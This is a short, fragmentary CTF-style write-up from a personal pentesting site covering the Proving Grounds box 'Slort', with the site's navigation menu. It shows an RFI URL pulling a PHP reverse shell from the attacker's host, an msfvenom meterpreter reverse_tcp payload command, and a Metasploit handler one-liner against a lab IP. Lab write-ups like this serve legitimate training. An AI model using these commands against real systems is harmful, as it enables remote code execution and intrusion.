AesirSec
  • 🏑Home
  • πŸ“šBlog
    • Radio Silence
    • OSCP Strategy
    • Plan for 2023
    • PNPT
    • Plan for 2022
    • eJPT
  • ❓Enumeration
  • 🐧Linux
    • Commands
    • Restricted Shell Bypassing
    • Stabilize Shell
  • πŸͺŸWindows
    • Commands
    • Transferring Files
  • πŸ“•Active Directory
    • Enumeration
    • Attacking AD Initial Vectors
    • Ipv6 attacks
    • Post Compromise Enum
    • Strategy
  • #️Privilege Escalation
    • 🐳Docker
    • 🐧Linux
    • πŸͺŸWindows
  • πŸ•ΈοΈWeb Apps
    • LFI
    • Apache
    • CSRF
    • PHP
    • XSS
    • SQLi
    • Pay Loads All The Things
  • πŸ‘ΎBuffer Overflows
  • πŸ’»Programming
    • 🐍Python
  • πŸ‘¨β€πŸ’»Ports/Technologies
    • FTP - Port 21
    • SSH - Port 22
    • Telnet - Port 23
    • DNS - 53
    • HTTP/S - 80/443
    • RPC - 135
    • SMB - 139/445
    • LDAP - 389/636
    • SQL - Port 3306
    • Docker
    • IIS
  • πŸ› οΈTools
    • ffuf
    • wwwtree
    • Rogue LDAP Servers
    • Wpscan
    • crackmapexec
    • msfvenom
    • John the Ripper
    • Hydra
  • 🐬Flipper Zero/ Radio Frequency
  • πŸ—ƒοΈBoxes/Write Ups
    • Template
    • πŸ‰Game Of Active Directory v2 - Day 1
    • Proving Grounds
      • Proving Grounds Practice
        • πŸ“šHeist
        • πŸ“šHutch
        • πŸͺŸInternal
        • πŸͺŸShenzi
        • πŸͺŸJacko
        • πŸͺŸDVR4 - qued
        • πŸͺŸNickel
        • πŸͺŸSlort
        • 🐧Walla
        • 🐧Snookums
        • 🐧Exfiltrated
        • 🐧Wheels
        • 🐧ClamAV
        • πŸͺŸSquid
        • πŸͺŸAlgernon
        • πŸͺŸHelpdesk
      • Proving Grounds Play
        • πŸͺŸSams
        • 🐧Assertion101
        • 🐧DriftingBlues6
        • 🐧DC-2 - unfinished
        • 🐧InfoSecPrep
        • 🐧Stapler
        • 🐧BBSCute
        • 🐧SoSimple
        • 🐧Solstice
        • 🐧FunBoxEasyEnum
        • 🐧Sumo
        • 🐧FunBoxRookie
        • 🐧MoneyBox
        • 🐧CyberSploit1
        • 🐧Wpawn
        • 🐧Dawn
        • 🐧Pwned1
        • 🐧FunBoxEasy
        • 🐧DC-1
    • TryHackMe
      • πŸͺŸAnthem
  • πŸ”—Helpful Links
  • πŸ§™whoami
  • πŸ΄β€β˜ οΈGithub
  • πŸ“‘Discord
  • 🐦Twitter
Powered by GitBook
On this page
  • IP: 192.168.116.53
  • Enumeration
  • Shell
  • Root

Was this helpful?

  1. Boxes/Write Ups
  2. Proving Grounds
  3. Proving Grounds Practice

Slort

PreviousNickelNextWalla

Last updated 2 years ago

Was this helpful?

IP: 192.168.116.53

Enumeration

Nmap scan

nmap  -sV 192.168.116.53 -A -p-

Found that this server is affected by RFI. Could see that when I included the IP address and sent that it actually hit my http server. Could not get pentest monkey php reverse shell to work. Uname does not exist. Found that uname is not a command on Windows systems.

http://192.168.116.53:8080/site/index.php?page=http://192.168.49.116/PHP/universalphprevshell.php

Shell

Found an interesting file.

Had to get a hint here as Winpeas did not turn up much.

Found backup folder at C:\Backup

Made a reverse shell with meterpreter hoping this would spawn another shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.116 LPORT=6698 -f exe -o reverse1.exe

Shell dropped as soon as it popped in. I believe this happened because I was just using nc as a listener when I used a meterpreter shell. Using revshells I got a one-liner for a meterpreter handler.

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.49.116; set lport 6698; exploit"

Wait for a while and never got a shell. Used TFTP.EXE. It does pop a shell back to me. Waiting again for TFTP.exe to run. Had to restart the machine as my VPN disconnected and the machine shutdown.

Root

Found a nice universal php shell at **** This new shell is compatible with Windows and Linux. Sent RFI attempt again.

πŸ—ƒοΈ
πŸͺŸ
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php